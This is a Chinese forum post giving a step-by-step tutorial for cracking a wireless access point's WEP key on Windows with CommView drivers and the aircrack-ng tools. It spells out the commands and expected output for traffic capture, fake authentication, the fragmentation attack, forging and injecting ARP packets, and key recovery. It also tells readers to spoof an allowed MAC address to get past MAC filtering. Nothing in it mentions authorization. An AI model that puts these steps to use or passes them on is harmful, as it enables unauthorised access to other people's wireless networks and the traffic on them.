- 论坛徽章:
- 0
|
|
准备:\r\n\r\n一. 首先你需要正确安装网卡驱动: 如果你的网卡不被commview支持的话,那么你需要安装wildpackets的驱动。\r\n\r\nCommview所支持的网卡\r\n\r\n1. 如果你的网卡被commview支持的话,那么点下面的地址下载驱动:\r\n\r\n\r\n2. 如果不被commview支持的网卡则可以下载widpackets的驱动:\r\n\r\n\r\n注意:下面的教程是在你正确安装commview的驱动的前提下进行的!\r\n\r\n二.你需要下载这个.dll文件(只适用于commview 的网友):\r\n\r\n三. 你需要下载aircrack 压缩包:\r\n\r\n\r\n四. 解压aircrack 压缩包到你的任意硬盘根目录,在这里我是解压到c盘\r\n\r\n五. 把B下载到的commview.dll 放到D解压的文件夹,应该放到目录c:\\aircrack\\\r\n\r\n六. 去目录c:\\program files\\commview for wifi\\(注意这个目录是安装完commview以后才会有,也就是A1你下载的文件),然后找到”ca2k.dll”文件,把”ca2k.dll”,拷贝到(c:\\aircrack).\r\n\r\n当你完成以上准备以后,就可以开始正式的破解了!\r\n\r\n\r\n破解:\r\n1:打开一个命令提示符 (开始 > 运行 > cmd.exe)\r\n2:在命令提示符窗口下面输入:\r\nCd c:\\aircrack\r\n按下回车\r\n3 在命令相同的提示符窗口下面输入:\r\nairserv-ng -d commview.dll\r\n按下回车\r\n你看到的回复应该跟下面一样:\r\nOpening card commview.dll\r\nSetting chan 1\r\nOpening sock port 666\r\nServing commview.dll chan 1 on port 666\r\n\r\n如果你没有看到上面的结果的话,而是看到下面的结果的话:\r\n\r\n注意这里可能会有两种情况出现!!!!!:\r\n\r\n(1)\r\n\"Opening card commview.dll\r\nAdapter not found\r\nget_guid()\r\nairserv-ng: wi_open(): No error\"\r\n这种情况那么你可以试试这个命令:\r\nairserv-ng -d \"commview.dll|debug\"\r\n然后你可能会看到下面的结果\r\n\r\nOpening card commview.dll|debug\r\nName: [CommView] Proxim ORiNOCO 802.11b/g ComboCard Gold 8470\r\nget_guid: name: {15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg Co\r\nmboCard Gold - Paketplaner-Miniport\r\nAdapter not found\r\nget_guid()\r\nairserv-ng: wi_open(): No error\r\n\r\n那么你只要输入下面的命令就可以了\r\nairserv-ng -d \"commview.dll|{15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82}\"\r\n\r\n或者会自动搜寻网卡,然后提示你是不是这个网卡,然你选yes/no,那么你需要选择yes就可以了\r\n\r\n(2)\"Opening card commview.dll\r\nF1\r\ninit_lib()\r\nairserv-ng: wi_open(): No error\"\r\n\r\n这种情况的话,那么你应该是由于安装了,windpackets 驱动而产生的问题,那么建议你安装commview 驱动,如果可能的话.\r\n\r\n\r\n实例:\r\n破解AP的ESSID = wifi16\r\n\r\n破解AP的BSSID = 11:22:33:44:55:66\r\n\r\n破解AP的CHANNEL=6\r\n\r\n自己用于监听网卡的MAC = 01:23:45:67:89:01\r\n\r\n\r\n1.首先监听AP\r\n\r\nairodump-ng --channel 6 --write Filename 127.0.0.1:666\r\n\r\n\r\n2.建立虚拟连接:\r\n\r\naireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666\r\n\r\n如果一切正常的话那么你会得到下面的回复:\r\nSending Authentication Request\r\nAuthentication successful\r\nSending Association Request\r\nAssociation successful\r\n\r\n如果你得到:\r\nAP rejects the source MAC address\r\n这说明你AP设置了MAC过滤,那你需要把你的MAC地址改成破解网络允许的地址.\r\n\r\n如果你持续得到:\r\nsending authentication request\r\n那么说明你离破解网络太远了,信号太弱,你需要离破解网络跟进一点,以获得更好的信号.\r\n\r\n\r\n3.利用-5碎片攻击模式进行攻击\r\n\r\naireplay-ng -5 -b 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666\r\n\r\n如果成功将会得到一个xor文件,例如文件为fragment-0124-161129.xor\r\n\r\n\r\n4.利用packetforge-ng 构造一个用于注入的arp包\r\n\r\npacketforge-ng -0 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w myarp\r\n\r\n\r\n5.利用-2的arp注入攻击模式进行注入\r\n\r\naireplay-ng -2 -r myarp 127.0.0.1:666\r\n\r\n\r\n6.利用aircrack来破解WP\r\n\r\naircrack-ng -n 64 Filename.cap\r\n |
|
免费注册
发表于 2012-03-30 11:15